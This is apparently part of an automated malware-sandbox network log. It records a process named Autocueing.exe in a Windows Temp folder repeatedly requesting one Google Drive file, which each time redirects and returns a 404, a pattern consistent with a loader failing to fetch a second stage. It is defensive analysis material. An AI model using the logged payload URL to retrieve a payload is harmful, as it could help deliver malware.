                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-7CsTRVnb4WasGqGK96J1jg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2025-01-11 04:28:23 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4e 4e 59 65 6a 71 57 57 61 47 47 4e 70 35 4c 30 43 4f 36 4a 58 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="NNYejqWWaGGNp5L0CO6JXw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    20192.168.2.650003142.250.185.1424435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:24 UTC417OUTGET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:25 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:24 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-O9j-yV2Hy2uTsoPzXeK7Tw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    21192.168.2.650004142.250.185.1294435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:25 UTC459OUTGET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:26 UTC1851INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgT2Tz-nLzfeouiVMgcteM6clqyKurOgG0pxibDr2J-_vv4rYGkrLgy9wNiZWKdMJMBHtpOv-HM
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:26 GMT
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-X6FZ-3sKC4xX1WAH8kl5vQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2025-01-11 04:28:26 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 36 36 43 36 4d 64 34 61 7a 41 79 2d 34 50 61 50 32 51 4d 78 34 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="66C6Md4azAy-4PaP2QMx4A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    22192.168.2.650005142.250.185.1424435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:27 UTC417OUTGET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:27 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:27 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-htCaTS-o4Q16lxyIKjqv7A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    23192.168.2.650006142.250.185.1294435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:28 UTC459OUTGET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:28 UTC1844INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgQdg3TVMX-a_iPYLkbx62FkNZvU-ShDRB7Od-cL7zyNH_2A1-OU21lheM8M_RrhuAlh
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:28 GMT
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-CvaZZ2HMnDn9pXKW8Navpg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2025-01-11 04:28:28 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6d 30 44 54 45 65 35 73 70 52 65 6e 73 32 4a 6a 72 75 6c 68 62 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="m0DTEe5spRens2Jjrulhbg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    24192.168.2.650007142.250.185.1424435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:29 UTC417OUTGET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:29 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:29 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-cXw8WEQpnQnbSU_VEbUa2w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    25192.168.2.650008142.250.185.1294435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-11 04:28:30 UTC459OUTGET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
                                                                                                                                                                                    2025-01-11 04:28:30 UTC1851INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgSW7B4xK-iM24x1n-HxQhtt6NgWM2W9XbogRsDXtHAuD_k4XzDtHGH1gjsyCslUyLHcBBy_IvY
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:28:30 GMT
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-FkxsjrcmzWo7SotIYkIFbw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2025-01-11 04:28:30 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6a 49 4d 4d 65 56 6f 59 69 72 57 46 39 4e 75 63 7a 56 6d 61 75 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jIMMeVoYirWF9NuczVmauw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    26192.168.2.650009142.250.185.1424435140C:\Users\user\AppData\Local\Temp\Autocueing.exe
